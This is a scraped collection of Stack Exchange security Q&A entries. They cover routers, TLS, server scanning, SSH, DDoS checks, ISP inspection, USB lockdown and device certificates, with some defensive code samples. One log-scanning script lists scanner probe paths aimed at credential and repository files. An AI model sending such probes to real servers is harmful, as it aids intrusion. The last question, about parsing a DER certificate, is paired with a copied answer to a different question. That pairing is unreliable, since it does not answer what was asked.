Authenticator at one end of a point-to-point LAN segment or
802.11 wireless link. (Source) In other contexts the entity being authenticated is often simply referred to as a client or user as that's in most cases unambiguous. | {
"source": [
"https://security.stackexchange.com/questions/154190",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/142261/"
]
} |
154,314 | I have here at home a router, like many people out there.
The router is connected with an Ethernet cable that comes from the modem. But, to prevent hackers or anything else to try bothering me, if I'm not using the router, is removing the Ethernet cable a good security measure? Or it doesn't do that much in security, so I should leave it always connected? | If there is not an internet connection to your device then a hacker is not going to be able to communicate with that device. (Edit: As some have pointed out...this is assuming an attacker is attempting over the internet from a remote location) With that said, eventually you will have to connect to the internet again if you want to use the internet and if you were to eventually obtain malware on your computer such as a keylogger. That keylogger is going to rely on the internet to send its data back to the hacker. If the keylogger is written properly, when you disconnect, it will just wait for you to connect to the internet again to send its data back to the attacker. In my opinion, I think disconnecting from your internet will prove to be more of a hassle than a protection. Instead, focus on the security of your device and your actions on the internet. Being a smart internet user can provide a great deal of security to your device. Elaboration (EDIT): I do agree that this method with decrease the time of opportunity for an attacker but the reason I chose to put emphasis on endpoint security and user education is because if you imagine an enterprise environment, they have devices and services that rely on an internet connection 24/7. So an enterprise can't rely on disconnecting from the internet as a viable security measure. Instead they focus on securing the devices on the network and the network itself. So I believe this will achieve 2 things: 1) greater security. 2) better user experience(always have internet access on demand) and I believe you can apply these strategies to your personal network as well. | {
"source": [
"https://security.stackexchange.com/questions/154314",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/79507/"
]
} |
154,335 | If we have a proprietary binary protocol used by some application, can we use SSL/TLS to encrypt the protocol's payload without tunneling it through HTTP? | Can we use SSL/TLS to encrypt the protocol's payload without tunneling it through HTTP? Absolutely.
TLS provides secure communication on top of the transport layer and you can easily employ it as a transparent wrapper around your own custom protocols. One advantage of TLS is that it is application protocol independent.
Higher-level protocols can layer on top of the TLS protocol
transparently. The TLS standard, however, does not specify how
protocols add security with TLS; the decisions on how to initiate TLS
handshaking and how to interpret the authentication certificates
exchanged are left to the judgment of the designers and implementors
of protocols that run on top of TLS. (from RFC 5246 for TLS 1.2) HTTP just happens to be one possible application-layer protocol that is commonly transmitted over TLS. There are many other examples where TLS is added to secure a protocol that has no built-in encryption. E.g., if you use a desktop email client, the communication with the mail server (probably using IMAP/POP3/SMTP) will likely be wrapped in TLS, too. TLS can also be used as an encrypted tunnel for the entire network stack for VPN applications (although OpenVPN only uses TLS for authentication, not for encrypting the actual data - thanks, @ysdx). | {
"source": [
"https://security.stackexchange.com/questions/154335",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/102334/"
]
} |
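A minimal client-side sketch of wrapping a custom binary protocol in TLS with Python's standard `ssl` module; the endpoint and payload bytes are placeholders:

```python
import socket
import ssl

HOST, PORT = "service.example.test", 9000   # placeholder endpoint
PAYLOAD = b"\x01\x00\x08customop"           # placeholder proprietary binary message

context = ssl.create_default_context()      # verifies the server certificate

with socket.create_connection((HOST, PORT)) as raw_sock:
    # The TLS layer is transparent to the application protocol: whatever
    # bytes go in come out the other side, just encrypted in transit.
    with context.wrap_socket(raw_sock, server_hostname=HOST) as tls_sock:
        tls_sock.sendall(PAYLOAD)
        reply = tls_sock.recv(4096)
        print("received", len(reply), "bytes over TLS")
```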
154,380 | I'm looking to buy a WiFi router on ebay, but the seller put a picture on the site of the router's backside, exposing information such as Serial number Part number MAC address Default password and PIN I plan to wipe the original firmware and replace it with DD-WRT . Could the above information still be used to compromise my network? | Yes this is safe. Default password and PIN are irrelevant if you change them (or replace the firmware.) Serial number is irrelevant anyway. Part number is irrelevant anyway. Which leaves the MAC address. With some routers this is used to compute a default password, but once you change this I don't believe there is any risk. The biggest risk of any router is the potential presence of backdoors that the manufacturer firmware may contain, but given that you are replacing it with DD-WRT that does not matter. | {
"source": [
"https://security.stackexchange.com/questions/154380",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/88435/"
]
} |
154,556 | As titled, we discovered some unknown IP address is accessing our API Server. We have set up an AWS EC2 instance as an API server. The API server URL is only used in our mobile app.
However, our mobile app has not been released yet and the API server URL is not linked from any public website. We can see the (multiple) attackers are randomly trying the URL path, i.e.
/admin/i18n/readme.txt
/a2billing/admin/Public/index.php
/current_config/passwd
/recordings/
/.git/objects How do they discover our server really? | The short answer is that many people are scanning everything most of the time. Doing so was, some years back, considered impractical, but the combination of better networks, better tools better throughput, and more of the space being in use means that is no longer the case. For example, Zmap claims on its front page: ZMap is capable of performing a complete scan of the IPv4 address space in under 5 minutes, approaching the theoretical limit of ten gigabit Ethernet. Botnets tend to distribute the same sort of scan across significant numbers of nodes, to achieve a similar result: any given machine on the internet is likely to be scanned at least once a day by a determined attacker/scanner. Once a webserver is identified on a given IP, there are all kinds of tools to test well-known paths, and tools that will try and guess at your sitemap. In short, welcome to the internet - where obscurity is not security. Do consider this in the context of setting up your app/services/widget - in all likelihood, things you would probably prefer to be 'secret' will not be, and defending your assets and resources is necessary. | {
"source": [
"https://security.stackexchange.com/questions/154556",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27044/"
]
} |
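The paths listed in the question are classic scanner probes, and they are easy to spot in ordinary web server access logs. A rough sketch that tallies scanner-looking requests per source IP; the log path, log format assumption (common/combined format), and probe patterns are all placeholders:

```python
import re
from collections import Counter

LOG_PATH = "/var/log/nginx/access.log"   # placeholder; any common/combined-format log

# Paths like these are fingerprints of automated scanners, not real users.
PROBE_HINTS = ("/admin/", "/a2billing/", "/.git/", "/recordings/", "passwd", "readme.txt")

line_re = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)[^"]*" (\d{3})')

hits = Counter()
with open(LOG_PATH) as log:
    for line in log:
        match = line_re.match(line)
        if not match:
            continue
        ip, path, status = match.groups()
        if any(hint in path for hint in PROBE_HINTS):
            hits[ip] += 1

for ip, count in hits.most_common(10):
    print(f"{ip}: {count} scanner-looking requests")
```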
154,735 | When co-workers travel internationally for business there seems to be a risk in bringing a regular work laptop to some countries: the risk is that the government might try to spy on the data stored on your device. The ones that immediately come to mind are China / N Korea. Is there a list of countries where this risk is highest? Is there a list of countries where it is recommended to take a 'burner laptop'? I am hoping for a list that is relevant to a US-based business. | Assuming you have a basic level of Cyber Security measures, e.g. encrypted hard drives, decent user name and password rules, encrypted VPN tunnels etc., I would say there are a number of issues to consider. Content on the laptops - is this commercially sensitive,
nationally sensitive, any export controls applicable. Effectively who would be interested in the data and what skills / resources do they have at their disposal? Your business - what it is you do and how that can be seen in
different cultures - are you at risk of industrial, national espionage or from hacktivism. The legality of your "standard" IT Security Solution in the country of destination - I believe some countries (especially middle east) have a big problem with encryption and prohibit any encrypted communications. Your level of risk acceptance based on the country of destination. E.g. do you mind if the US authorities exercise their right of search of your device and would you be happy to provide any decryption codes to the border staff before the laptop is taken away for investigation? A multinational company I work closely with all laptops have HDDs which are high level encrypted and where remote access is authorized it is via VPN but only with RSA tokens has a list of "home" countries where standard laptops can be taken, this is essentially all the countries the company has a major presence (except USA). Outside of that the user "should" contact IT and obtain a loan laptop there are 2 levels "amber" and "red" based on Security advice on the country of destination. "Amber" is for relatively friendly countries where for business purposes a clean laptop is taken (so a fresh internal build) with only files needed for the business trip are taken, these can connect via vpn back home and essentially work similar to the traveler's normal laptop. The issue here is to minimize risks from data loss, export offenses etc, whilst maintaining a good level of access "Red" is for particularly risky countries where data intercept is to be expected these include China, Russia or where encrypted VPNs are banned in law. These laptops are very basic with fresh installs of base windows with basic office software, public email, internet access and only approved files may be loaded on to them (e.g. pre-cleared presentations), these "red" devices have no way of 'phoning home' and will be wiped on return and once being marked as a "red" laptop they will remain "red" until they are finally shredded (literally). I have heard some organizations which have a process in place to counter the risk of border security searches e.g. in the US by having a process where the device is encrypted before travel and critically the user does not know the decryption code so is unable to login. That is only disclosed once the traveler gets through immigration the process is printed and the traveler can show that to immigration staff and apparently that gets round the right to search non US citizens, but not being a lawyer I'm not sure how true this is. | {
"source": [
"https://security.stackexchange.com/questions/154735",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/12253/"
]
} |
154,800 | Imagine I wish to upload my sensitive personal information (photos, document scans, list of passwords, email backups, credit card information, etc.) on Google Drive (or any other cloud service). I want to make sure this entire bunch of data is as safe as possible (against hackers that would in some way get their hands on this data, and against Google and its employees, and also in the future, i.e. if I delete this data from Google I want to be sure they won't be able to 'open' it even if they keep its backup forever). So in this case instead of uploading all this data right away to the cloud, I will instead make one folder containing all the data I want to upload, and then I will compress this entire folder using 7-Zip and of course password-protect it using 7-Zip. I will do this not once, but a few times, i.e. once I have the 7-Zip password-protected archive ready, I will compress it once again using 7-Zip and use a completely different password. I will do this five times. So in the end my data is compressed five times and it has been password-protected using 7-Zip by five completely different unrelated passwords. So in order to get to my data I have to extract it five times and provide five different passwords. What I will then do is that, I will take this five-times-password-protected archive, and I will compress it once again using 7-Zip and yet a different sixth password, but in addition to that this time I will also choose to split the archive into smaller chunks. Let's say in the end I end up with 10 split archives, where each of them is a 200 MB archive except the 10th one being only a 5 MB archive. The assumption is, all those six passwords are at least 32-character passwords and they are completely unrelated and they all contain lower/upper case, numbers, and symbols. Now I take those nine 200 MB archives and put them in one container and encrypt the container using VeraCrypt (assuming the three level cascade encryption) and then upload this container to my Google Drive. I keep the 10th archive (the 5 MB one) on a completely different service (say on Dropbox -- and that Dropbox account is in no way connected/linked to my Google account at all) (also encrypted by VeraCrypt). - Have I created a security theater ? Or have I really made it impossible for anyone to access and extract my data? After all they have to pass one level of encryption by VeraCrypt and even after that the archives are six times password protected and one of the archives (the tenth one) is stored somewhere else! - If someone gets access to my Google Drive and downloads all those nine archives, is there any way for them to extract the archive without having the last (the tenth) 5 MB archive? Can the data in any way be accessed with one of the split-archives missing? - Even if someone gets their hand on all those 10 archives together and manages to bypass the VeraCrypt encryption in any way, will it be still feasible to break the six remaining passwords? | First of all, that multi-encryption scheme is ridiculous. The algorithm used by 7-Zip is AES-256 which is considered secure. But if someone would find a flaw in it which would make it breakable, then they would likely be able to break all your encryption layers with equal effort. So either you trust the encryption algorithm used by 7-Zip, then one application would be good enough. Or you don't trust it, then you would do another encryption pass with a different algorithm. 
Layering the same algorithm multiple times often doesn't have as much effect as one would think, as the meet-in-the-middle attack on Triple-DES demonstrated. Regarding splitting up an encrypted file: It is often possible to rescue some data from a 7-Zip archive if parts of the archive are missing. 7-Zip uses AES in CBC mode to emulate stream-cipher behavior (every 128-bit block is combined with the previous 128 bit block). That means if someone is missing a part of the message, they can't decrypt anything which follows (unless they have a known plaintext somewhere), but everything which comes before it. That means if you want to prevent an attacker from decrypting the archive by withholding a part of it, you need to withhold the first chunk, not the last one. | {
"source": [
"https://security.stackexchange.com/questions/154800",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/142930/"
]
} |
154,803 | It's a common need to prove that a file is truly created by someone, and I think GnuPG did the job. However, anyone can generate a gpg key with an unverified email. GPG key servers doesn't verify my email address at all. Is there any CA that provides identity validation like signing a HTTPS Certificate does? | | {
"source": [
"https://security.stackexchange.com/questions/154803",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/142948/"
]
} |
154,873 | I recently had a conversation with my boss and an IT contractor that they use. My request to allow outside access to a machine on the network via SSH was denied on the grounds that SSH is insecure. I asked for an explanation and unfortunately did not understand it - the contractor stated SSH was insecure but did not know why. Why is SSH insecure? There seems to be something I missed during our conversation that I desperately want to understand. My proposal for SSH included using key-based access and fail2ban. UPDATE: To explain the discussion, as soon as I asked the contractor why he thought SSH was insecure he said, verbatim, "I don't know" and proceeded angrily with an increased tone of voice for the rest of the conversation. I tried to extricate myself but had to fend off some strawmen to avoid looking completely incompetent due to his badgering. I made the arguments that most of the good answers to this question make below and they were promptly ignored. Those same answers are extremely unconvincing if viewed with a skeptic eye. I'm not sure if my (which is the IT contractor's) question sets an unreasonably high burden of proof which can never be met, for either direction. If that is the case it would be wise to speak to that. | SSH is not typically considered insecure in and of itself but it is an administrative protocol and some organizations require two or more layers of control to get access to an administrative console . For example connecting via a VPN first then opening an SSH session which connects through that VPN. This simply provides multiple layers of defense in depth and prevents your systems from being directly affected by the latest SSH vulnerabilities. Note: This is NOT a weakness in SSH itself and many organizations will still expose SSH on high TCP ports for use as SFTP servers then have a script move data to and from that system (not allowing the external SSH/SFTP server to connect to the rest of their network). All protocols eventually have vulnerabilities so if you can require the use of two different ones (i.e. IPSEC VPN and SSH) and stay disciplined about remediation efforts when vulnerabilities are discovered then the window of time where known vulnerabilities exist in both protocols at the same time on your network should be very small. Statistically, the requirement for using two protocols should reduce the amount of time where you would have a single protocol exposed with a known vulnerability (assuming you actually patch/remediate vulnerabilities). As a poor text graphic look the following: Time --->
IPSEC ------------------------ ----------------
SSH --------- ----------------------------- Versus having just SSH, or a VPN, by itself: SSH --------- ----------------------------- In the first example when an SSH vulnerability came out there wasn't one for IPSEC and vice versa so there was never a time, in this crude example, where your systems had vulnerabilities at both layers. This defense in depth is what is protecting the system behind these protocols which occasionally may have vulnerabilities. In the second example, SSH by itself, the moment there is a vulnerability, or a password breach, or any number of other issues, an attacker can directly access your vulnerable system during the window of exposure. I would ask if any other administrative protocols are being exposed and if so then you can question the technology bias but most likely you may be in an organization that doesn't allow any administrative protocols to be accessed directly from the Internet. | {
"source": [
"https://security.stackexchange.com/questions/154873",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
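To put a rough number on the layering argument in the answer above, here is a minimal Python sketch. The per-day vulnerability probabilities are invented purely for illustration (they are not real statistics), and independence between the two protocols is assumed.

p_ssh_vulnerable_today = 0.02   # made-up chance SSH has an unpatched flaw on a given day
p_vpn_vulnerable_today = 0.01   # made-up chance the IPSEC VPN has one on the same day

exposure_ssh_only = p_ssh_vulnerable_today
exposure_layered = p_ssh_vulnerable_today * p_vpn_vulnerable_today  # both layers must be broken at once

print(f"SSH exposed directly:       {exposure_ssh_only:.4%} of days")
print(f"SSH behind the VPN as well: {exposure_layered:.4%} of days")

Under these assumptions the directly exposed setup is vulnerable on about 2% of days, while the layered setup needs both protocols to be broken at the same time, which is far rarer.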
154,889 | I am wondering how big companies manage access to their codebase from their developers. In order to make their code safe do they allow their developers to have access to entire codebase or to only particular subprojects to avoid stealing the entire codebase ? For example, if a company has 10 developers, should they set in place access control policies, so each developer will have access only to particular module he/she needs to develop? If so, please let me know how to achieve this. [Edited]: As expected the code source has been taken from one of the developers and sold it to somebody, it was done by trusted developers for those who says trust is must. | In any sanely managed company, a developer usually gets full access to the sourcecode of any project they work on. The reason is that the benefits of releasing parts of the code on a strict need-to-know basis isn't worth the bureaucratic hassle and the huge work impairment it creates for the developers. Developers can't work without seeing the whole picture. I am a professional software developer who works in a team which maintains a huge system. Most of the problems I get tasked to fix are bugs which could be in any part of the system. I need the full sourcecode in order to figure out where the bug originates and how to fix it. I wouldn't be able to do that job if I would need to fill out a form and wait for management approval before I can look at some of the modules which could have something to do with it. Good software developers don't grow on trees. They are hard to replace and they can easily get a job somewhere else. To get and keep the best talent, you need to treat your developers well. If my company would start to hassle me with unreasonable access restrictions to sourcecode, it would frustrate me because I can't work efficiently and it would insult me because it means they don't trust me. I would be gone in a few weeks. Most code isn't actually that valuable. Most code which gets written in the world is only useful for solving the problem of one specific client. For anyone else, the code is completely worthless. Even if the code is valuable to a larger demographic, you have the law to protect it. Copyright and non-disclosure clauses in work contracts allow you to sue the pants off of anyone who tries to sell your intellectual property to someone else. Technical measures to prevent sourcecode leaks on a network layer (like proposed in the comments to the question) are not an effective solution either. Developers are smart. They solve computer problems for a living. If they really want to get some information out of your building, they will find a way to do it. Not even the NSA was able to prevent Edward Snowden from leaking gigabytes of confidential data. Besides, a malicious developer can do far more harm than just leak your sourcecode. There isn't much you can do about that, because the more you try to monitor and limit your developers, the less efficient they will be and the more unhappy they will become. So what can you do to prevent your developers from turning against you? It's simple: Don't hire developers you can't trust and treat them well so they won't form a grudge against you . That means if you are a manager suffering from paranoia and trust issues, then software development is not the right industry for you (you might want to give retail a chance). | {
"source": [
"https://security.stackexchange.com/questions/154889",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/131039/"
]
} |
154,975 | Some sites I visit take me to a page that says roughly, "Checking your browser before accessing example.com. DDoS attack protection by CloudFlare". What exactly about my browser is being checked and how will that help protect against a DDoS attack? | Most Denial-Of-Service (DOS) attacks rely on some asymmetry between the resources involved on attacker side and on target side. In other words, to be successful, a DOS needs an action to require very few resources client-side (so the each clients can send a lot of requests) while involving larger resources server-side (so the server(s) will be unable to handle the load). Due to this, DDOS attacks (the "Distributed" version of DOS attacks) are obviously not engaged by real humans clicking on links in a browser tab, but by bots sending massive amount of parallel requests to the target. The consequence of this is that the DDOS "client" is not a real browser, but a tool which may more-or-less simulate one. Cloudflare DDOS protection system is quickly described on their website as follow: "an interstitial page is presented to your site’s visitors for 5 seconds while the checks are completed" . Two things trigger my attention here: The checks : the most obvious way to sort real website users from automatic DDOS bots is to check whether the HTTP client is a real browser or not. This can go through testing the client's behavior against a panel of tests (see the post " bot detection via browser fingerprinting " for instance) and compare the result with the one expected from a genuine instance of the browser the client claims to be (for instance if the client claims to be a Firefox version 52 running on a Windows 10 machine, does it present the same characteristics?). 5 seconds : Executing JavaScript tests and redirecting the visitor could be a very fast and almost transparent operation, so I believe that this "5 seconds" timeout is not there by accident but is meant to revert the computational asymmetry back in favor of the server. The most light version of such principle would simply be to ask the client to wait (sleep) 5 seconds before resubmitting the same request (with a unique identifier stored in a cookie, as described on Cloudflare page). This would force the DDOS client to somehow handle a queue of pending redirections, and would finally make the overall DDOS process less effective. A more brutal alternative would be to request the browser to solve some mathematical challenge which would require a few seconds to be solved on an average home system. In such a case, attackers would have no other choice than spend computational power to solve these challenges if they would like to proceed, but doing so will completely void the asymmetry since all the attacker's resource will be busy in solving challenges instead of sending requests, finally "DOSing" the attacker's system instead of the target's one. | {
"source": [
"https://security.stackexchange.com/questions/154975",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
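The "mathematical challenge" idea mentioned in the answer above can be illustrated with a hashcash-style proof-of-work sketch in Python. This is not how Cloudflare actually implements its check; it only shows the principle of making the client spend noticeable CPU time on something the server can verify cheaply. The difficulty value is an arbitrary example.

import hashlib
import os

def solve_challenge(challenge: bytes, difficulty_bits: int = 20) -> int:
    # Find a nonce so that sha256(challenge + nonce) starts with difficulty_bits zero bits.
    target = 1 << (256 - difficulty_bits)
    nonce = 0
    while True:
        digest = hashlib.sha256(challenge + nonce.to_bytes(8, "big")).digest()
        if int.from_bytes(digest, "big") < target:
            return nonce  # costly to find, but a single hash for the server to verify
        nonce += 1

challenge = os.urandom(16)          # issued by the server, unique per visitor
print("nonce found:", solve_challenge(challenge))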
155,057 | I found out that my ISP does deep packet inspection.
Can they see the contents of HTTPS connections? Wouldn't having HTTPS ensure that they can't see the contents being transferred? And can having a VPN protect me against deep
packet inspection by ISPs? | Deep Packet Inspection, also known as complete packet inspection, simply means they are analyzing all of your traffic as opposed to just grabbing connection information such as what IP's you are connecting to, what port number, what protocol and possibly a few other details about the network connection. This is normally discussed in contrast to the gathering of NetFlow information which mainly collects the information listed above. Deep packet inspection gives your provider a lot of information about your connections and habits of Internet usage. In some cases, the full content of things like SMTP e-mails will be captured. HTTPS does encrypt the connections but your browser has to make DNS requests which are sent primarily via UDP so that data will be collected as will any unencrypted links or unencrypted cookies sent incorrectly without https. These additional bits which will be collected may be very telling about what type of content you are looking at. The larger concern for most people is about data aggregation , by collecting this information a data scientist could create a fingerprint for your Internet usage and later associate with past activities or activities from other locations (when you are at work or are on vacation). Likewise, your service provider may choose to sell this to any number of organizations (possibly including criminal organizations) where it could then be used against you in ways. In many countries, people have an expectation that their communications are considered to be private and collecting this data very much goes against that privacy expectation. Another interesting aspect of this is in the cases like the US where this data may soon be sold it allows International communications sent to people, or servers, in the US be sold as well . Likewise, this could potentially allow every agency from local law-enforcement, military, tax authorities, immigration authorities, politicians, etc. a way to bypass long-standing laws which have prevented them from accessing this type of information, or important informational subsets within this data otherwise. A slightly different concern when this data can be sold is competitive intelligence / corporate espionage. In the scenario where a company does a lot of research-intensive work at their headquarters located in some small geographical location (think of pharmaceuticals or a defense contractor) selling that data makes it possible for anyone to buy all of the traffic from the local ISP where most of those researchers live and analyze what they are looking for when at home, possibly even directly from the ISP hosting the traffic for their corporate headquarters. If other countries aren't selling similar data it gives foreign companies and companies wise enough to try and buy this data a huge technical advantage. Likewise, it would also allow foreign governments to buy ISP traffic which includes the data from US (or other government) Officials homes. Imagine companies monitoring their employee's behavior at home or on their mobile devices. This will likely have a chilling effect on activists and whistle-blowers as well. Likewise, if credit cards or PII are sent in the clear to a poorly secured remote site your ISP's data set now has a potential PCI or PII regulatory issue on their hands. So this amplifies data-leakage problems of all types by making additional copies of the data leaked. 
With the examples I've just mentioned above, and there are hundreds of others, it should be easy to see why this type of data collection has a different level of importance to it than just metadata or basic connection information. Even if your ISP never sells this data they are collecting quite an interesting dataset. It's a security issue that definitely has a lot of potential long-term security implications. | {
"source": [
"https://security.stackexchange.com/questions/155057",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141656/"
]
} |
155,132 | Suppose I have a Windows PC in a safe room, disconnected from the internet, with only 3 cables connecting to another room, to a mouse, monitor and keyboard. The computer contains highly sensitive data. The HDMI monitor cable is no problem, but the mouse and keyboard cables are USB cables, and could be connected to some USB drive. I am specifically interested here in securing the USB cables. Please disregard other ways of stealing information, like taking photos of the screen etc. My question is: How can I make sure only some specific mouse and keyboard are allowed to be connected to the USB cables? For example, is there some kind of hardware I can put between the USB cable and the computer to make sure only some allowed device is connected to it? Security KVM Switches (Keyboard-Video-Monitor switches) are not good because in practice all of them seem to introduce some small delay (lag, or latency) when moving the mouse or typing. It really must feel as if you are directly connected (no lag whatsoever). Maybe there are some Arduino, BasicX, Parallax, Pololu, or Raspberry Pi projects out there to filter USB communication and let through only allowed devices, with no lag? I know there is software to do that (e.g.: https://support.symantec.com/en_US/article.TECH175220.html ) but since the user is using the computer he could disable it. | Buy a PS2 to USB adapter for keyboards+mice (important: both need to be in one usb port to make sure it's not a naive straight-through connector). They have logic and cost about $10 USD at time of writing. Then buy USB to PS2 adapters for both mice and keyboard (separate adapters). They have no logic, just internal wiring to each connection and they cost less than $5 USD at time of writing. Put them altogether. Yes, it looks funky, but the devices will still work as-expected. Now, even if one of the user-reachable cables is spliced, they can't add new hardware other than generic mice and keyboards. Nice things about this: cheap simple hardware-implemented protects against unknown devices OS-independent UPDATE:
I manually verified, twice, that there is no continuity between USB's data-/data+ pins and the PS2 data/clk pins (or any other PS2 pins) on a two-in-one adapter. There is continuity on single-port adapters, but that's not important as long as one of the adapters implements some kind of logic like the two-in-one does. Plugging the empty adapter into a Windows box should cause the "USB insertion ding"; otherwise it's a naive physical adapter. The dual PS2-USB adapter I specifically tested was an "ez-pu21", still available on Amazon. UPDATE #2, two things: there are USB keyboard attacks, so you need to lock down the OS properly to maintain security. One can get into the BIOS with a keyboard, and I'm not sure how risky that is for exfiltration, or if all they can do is "break" the computer. UPDATE #3:
After using the double-inline adapters for about 24 hours, I can say they work, but not quite 100%, maybe 99%. When I was doing serious programming (typing) I noticed that keys held down for about 1/3rd of a second repeat. This is before my typematic repeat about 2/3rds of a second after the press, and it only repeats once, leading to stuff like "biig" instead of "big". I only noticed it a few times, late at night, but I wanted to mention it. I didn't even notice it until after hours of use, but if you were writing a novel, it might be frustrating. It could just be the cheap adapter I used, the really long cables I'm using, or something else nobody will experience. BONUS (related but OT): I just realized these cheap USB switches don't connect the data pins (they are too cheap to switch all 4 wires), thus making a cheap "USB condom" for those who desire such a thing; thought I'd share. Cheap condoms, how can you go wrong? | {
"source": [
"https://security.stackexchange.com/questions/155132",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/83482/"
]
} |
155,403 | We are developing a product (device / system) that will be installed on customer sites. Many of our customers will (should) be concerned about security, and should be thinking about it seriously. Our product provides an API via HTTPS, which is used by the built-in UI and is also open for use by customers. I'm looking for information and advice on how to deal with the SSL certificates that are installed in our product when they leave the factory. I would appreciate any input - have we overlooked or missed anything? As It Stands Today Currently (the system is in development) we are installing the same self-signed certificate into every development and prototype unit. This clearly has no chain of trust and the user will see a warning. I believe that this is the same approach taken by other manufacturers (e.g: Cisco, Ubiquiti), but confirmation would be appreciated. Options Customers will be able to provide their own certificates , signed in whatever manner they wish (publicly, or privately). This will give them the chain of trust, and will allow them to be sure that they really are connecting to *that* system. Installing a different self-signed certificate on each unit . I'm not sure there is any benefit to doing this over sharing a single self-signed certificate across all units, as the certificate is still untrusted. Installing a publicly signed certificate on each unit that leaves the factory. As far as I can tell, this will not work . Certificates are tied to a FQDN (possibly with a wildcard), and as such there is no way for us to generate and sign a certificate for the customer. | We are installing the same self-signed certificate into every development and prototype unit. Installing the same certificate into every unit is about the worst security practice one could imagine when dealing with certificates. We now know not to release products with the default hard coded administrative credentials. We avoid default credentials because such credentials could be extracted once and used to compromise all devices that implement them. This is a very similar situation – the default certificate means the private key could be extracted once and used to compromise all devices that rely on this certificate. Cryptographically, both self-signed and trusted third party certificates operate the same way. Each certificate is associated with a key pair consisting of a secret private key and a non-secret public key. If you know the private key, then you can perform every action associated with the public key and certificate. The compromise of the default certificates has further implications than just compromising authentication. For TLS, depending on the cipher used, the certificate could end up being used to establish a shared secret. In such cases, a passive eavesdropper would be able to decrypt TLS traffic after seeing the initial handshake. Sure, competent administrators will fix this issue by uploading their own unique certificates, but how many would actually stop at 'just make it work' stage by trusting the default certificate?
What you should do instead is generate a new key pair on initial boot or factory reset. This is how secure network devices operate. When generating a new certificate, you also have to make sure that you have sufficient entropy available in the system and do not end up generating factorable keys (see the sketch after this entry for one way the first-boot generation could look). | {
"source": [
"https://security.stackexchange.com/questions/155403",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141974/"
]
} |
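As a hedged illustration of the "generate a new key pair on initial boot or factory reset" advice above, here is a Python sketch using the cryptography package. The file paths, common name, key type and validity period are arbitrary placeholders, and a real product would also have to worry about entropy availability at first boot and about protecting the stored key.

import datetime, os
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec

KEY_PATH, CERT_PATH = "/etc/device/tls.key", "/etc/device/tls.crt"   # hypothetical paths

def ensure_device_identity():
    if os.path.exists(KEY_PATH):      # only generate on first boot or after factory reset
        return
    key = ec.generate_private_key(ec.SECP256R1())
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "device.local")])
    now = datetime.datetime.utcnow()
    cert = (x509.CertificateBuilder()
            .subject_name(name).issuer_name(name)     # per-device self-signed placeholder
            .public_key(key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(now)
            .not_valid_after(now + datetime.timedelta(days=825))
            .sign(key, hashes.SHA256()))
    with open(KEY_PATH, "wb") as f:
        f.write(key.private_bytes(serialization.Encoding.PEM,
                                  serialization.PrivateFormat.PKCS8,
                                  serialization.NoEncryption()))
    with open(CERT_PATH, "wb") as f:
        f.write(cert.public_bytes(serialization.Encoding.PEM))

Customers who want a chain of trust can still replace the generated self-signed certificate with one they sign themselves, as described in the question.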
155,407 | I have the following bytes array storing a certificate chain (DER encoded): 3082020B3081F4A003020102020500A95AEE5F300D06092A864886F70D01010B0500301C311A301806035504031311544C532050726F6F6620526F6F74204341301E170D3137303331363131333435315A170D3137303631363131333435315A303E310B300906035504061302434831123010060355040A1309544C532050726F6F66311B301906035504031312746C7370726F6F667365727665722E636F6D3059301306072A8648CE3D020106082A8648CE3D030107034200048734740464EBB11EE51C58F19DD761521BC954D291165F6E51E829DB61A3678189FD1AB5F624647F5DFC4F3B60CE3FF78566A53D392417CADEE47FE39EA88C75300D06092A864886F70D01010B050003820101006764246DDECF8CCB50794AC25D19FF3A9242380518FC73A9281B8057AE038F1572E0ADC10A8D7CABCAF339CE484F8EA41423A8933A92E080E2EE07FE06173D2262092D0EE953F8340AE224FB9E16342249EBCE2FE657C99F4D1CD6CD5981DCA5FE46D992053F38384CF92FC5FCD5354829C3A78D2666E0E2FB46FED7BFC9F19C9C633620A77F30F7BFED5A4E853E7F14B87481D41E24D3D9ABFFB5F6E57698A591889396A95B7329E40FE06448EDF07995D3DFF74C4B8EA89AF1FE3CF707DC0E100BE0107A70BCF94AFF350B1314F3F2E320256BBAB3EB7495161983FEEF5D55CE2C981C589F02333990D3B9E913A88F5000ED65109E40D73F43D75F13A31CE6 What is the public key and is the offset to read it constant? | We are installing the same self-signed certificate into every development and prototype unit. Installing the same certificate into every unit is about the worst security practice one could imagine when dealing with certificates. We now know not to release products with the default hard coded administrative credentials. We avoid default credentials because such credentials could be extracted once and used to compromise all devices that implement them. This is a very similar situation – the default certificate means the private key could be extracted once and used to compromise all devices that rely on this certificate. Cryptographically, both self-signed and trusted third party certificates operate the same way. Each certificate is associated with a key pair consisting of a secret private key and a non-secret public key. If you know the private key, then you can perform every action associated with the public key and certificate. The compromise of the default certificates has further implications than just compromising authentication. For TLS, depending on the cipher used, the certificate could end up being used to establish a shared secret. In such cases, a passive eavesdropper would be able to decrypt TLS traffic after seeing the initial handshake. Sure, competent administrators will fix this issue by uploading their own unique certificates, but how many would actually stop at 'just make it work' stage by trusting the default certificate?
What you should do instead is generate a new key pair on initial boot or factory reset. This is how secure network devices operate. When generating a new certificate, you also have to make sure that you have sufficient entropy available in the system and do not end up generating factorable keys. | {
"source": [
"https://security.stackexchange.com/questions/155407",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/143590/"
]
} |
